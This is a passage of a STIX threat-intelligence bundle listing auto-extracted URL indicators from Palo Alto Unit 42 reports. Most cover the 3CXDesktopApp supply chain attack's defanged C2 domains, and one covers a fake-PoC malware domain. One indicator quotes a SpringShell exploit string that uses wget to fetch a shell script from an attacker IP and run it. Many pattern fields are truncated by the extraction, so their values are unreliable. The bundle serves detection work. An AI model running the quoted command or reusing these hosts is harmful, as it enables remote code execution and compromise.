3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: d4c310c262a88896c57bbe3b6456bd090 icon10.ico and icon11.ico hxxps://akamaitechcloudservices[.]com/v2/storage d51a790d187439ce030cf763237e992e9196e9aa417","pattern":"[url:value = 'https://akamaitechcloudservices[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b5a44659-2d1f-43f5-b7c6-8cdbd0a3e6dc","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://azuredeploystore[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: 74e059cf1720d77c47b97d97c3b0cf43ade5d96bf724639bd icon4.ico hxxps://azuredeploystore[.]com/cloud/services c13d49ed325dec9551906bafb6de9ec947e5ff9","pattern":"[url:value = 'https://azuredeploystore[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ae131259-323a-46f8-9f6b-e24efe0d79a5","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://azureonlinestorage[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: 030cf763237e992e9196e9aa41797a94956681b6279d1b9a icon12.ico hxxps://azureonlinestorage[.]com/azure/storage 4e08e4ffc699e0a1de4a5225a0b4920933fbb9cf","pattern":"[url:value = 'https://azureonlinestorage[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--056f7734-f8c0-4de0-8664-d07f32c1a9c8","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://glcloudservice[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: f1d0f17e0242efd78fd4ed0c344ac6469611ec72defa6b2d icon14.ico hxxps://glcloudservice[.]com/v1/console f47c883f59a4802514c57680de3f41f690871e26f25","pattern":"[url:value = 'https://glcloudservice[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--de58395d-8009-4b7e-a98d-70069cf0dc38","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://msedgepackageinfo[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: de4a5225a0b4920933fbb9cf123cde33e1674fde6d61444f icon13.ico hxxps://msedgepackageinfo[.]com/microsoft-edge 8c0b7d90f14c55d4f1d0f17e0242efd78fd4ed0","pattern":"[url:value = 'https://msedgepackageinfo[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--489f449b-3f97-4ec5-9230-afa631b4f259","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://msstorageazure[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: e0a2b07bf4771e897fb5a617998aa4876e0e1baa5fbb8e25c icon1.ico hxxps://msstorageazure[.]com/window d459aa0a63140ccc647e9026bfd1fccd4c310c262a88896","pattern":"[url:value = 'https://msstorageazure[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--70a8ec54-d8a5-43b7-b5c8-ba20de80b673","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://msstorageboxes[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: 551906bafb6de9ec947e5ff936e7e40877feb2ba4bb176396 icon5.ico hxxps://msstorageboxes[.]com/office f1bf4078141d7ccb4f82e3f4f1c3571ee6dd79b5335eb0e","pattern":"[url:value = 'https://msstorageboxes[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ecfb07aa-bb6c-4bd3-af02-c2ac547bf99b","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://officeaddons[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: b4f82e3f4f1c3571ee6dd79b5335eb0e0464f877e6e6e3182 icon6.ico hxxps://officeaddons[.]com/technologies 2487b4e3c950d56fb15316245b3c51fbd70717838","pattern":"[url:value = 'https://officeaddons[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--55c87296-7a28-4e3a-a7de-f9b1fed97288","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://officestoragebox[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: 68b769f333a48e228c32bcf26bd98e51310efd48e80c1789f icon2.ico hxxps://officestoragebox[.]com/api/session 268d4e399dbbb42ee1cd64d0da72c57214ac987efb","pattern":"[url:value = 'https://officestoragebox[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5971627e-fada-4c00-bf88-8df62b91ebbd","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://pbxcloudeservices[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: 0024533510ce22d71e05b20bad74d53fae158dc752a65782e icon9.ico hxxps://pbxcloudeservices[.]com/phonesystem Table 1. Icon files hosted at GitHub accou","pattern":"[url:value = 'https://pbxcloudeservices[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1b53533c-3e63-4676-a80f-42c4016e0d3c","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://pbxsources[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: 14c57680de3f41f690871e26f250c6e890651ba71027e4d3 icon15.ico hxxps://pbxsources[.]com/exchange 2c9957ea04d033d68b769f333a48e228c32bcf26bd98e","pattern":"[url:value = 'https://pbxsources[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bafccd27-3f32-4da1-8817-0deb1e8605b6","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://raw.githubusercontent[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: name includes a randomly generated number between 1 and 15: hxxps://raw.githubusercontent[.]com/IconStorages/images/main/icon[1-15].ico This request l","pattern":"[url:value = 'https://raw.githubusercontent[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--939f3dea-75ec-4d63-8610-00308f25ea2f","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://sourceslabs[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: fb15316245b3c51fbd70717838f6f82f32db2efcc4d9da6de icon7.ico hxxps://sourceslabs[.]com/downloads e059c8c8b01d6f3af32257fc2b6fe188d5f4359c308b","pattern":"[url:value = 'https://sourceslabs[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e8886272-f91b-4e0f-b164-c9518ab66ab1","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://visualstudiofactory[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: ee1cd64d0da72c57214ac987efbb509c46cc57ea6b214beca icon3.ico hxxps://visualstudiofactory[.]com/workload c62dce8a77d777774e059cf1720d77c47b97d97c3b0cf","pattern":"[url:value = 'https://visualstudiofactory[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8893176d-8c71-47fe-8c36-01c070f7596c","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://zacharryblogs[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: af32257fc2b6fe188d5f4359c308b3684b1e0db2071c3425c icon8.ico hxxps://zacharryblogs[.]com/feed d0f1984b4fe896d0024533510ce22d71e05b20bad74d53fae","pattern":"[url:value = 'https://zacharryblogs[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0e9f3aea-b49e-4c1e-9db1-a102b5ffae94","created":"2026-08-17T10:58:47.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://107.174.133[","description":"Seen in \"CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) (Updated)\" (Palo Alto Unit 42). Context: atwar.jsp?pwd=j&cmd=/bin/sh/-c${IFS}'cd${IFS}/tmp;wget${IFS}hxxp://107.174.133[.]167/t.sh${IFS}-O-%a6sh${IFS}SpringCore;' Upon further anal","pattern":"[url:value = 'http://107.174.133[']","pattern_type":"stix","valid_from":"2026-08-17T10:58:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e5d4e962-7497-4b2e-ab95-11cd8a8f8a9f","created":"2026-08-17T10:57:32.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://checkblacklistwords[","description":"Seen in \"Fake CVE-2023\" (Palo Alto Unit 42). Context: e PoC code to GitHub. However, the HTTP response to the URL hxxp://checkblacklistwords[.]eu/ has a Last-Modified field that is set to Sun, 16 Jul 2","pattern":"[url:value = 'http://checkblacklistwords[']","pattern_type":"stix","valid_from":"2026-08-17T10:57:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/fake-cve-2023-40477-poc-hides-venomrat/"}]}]}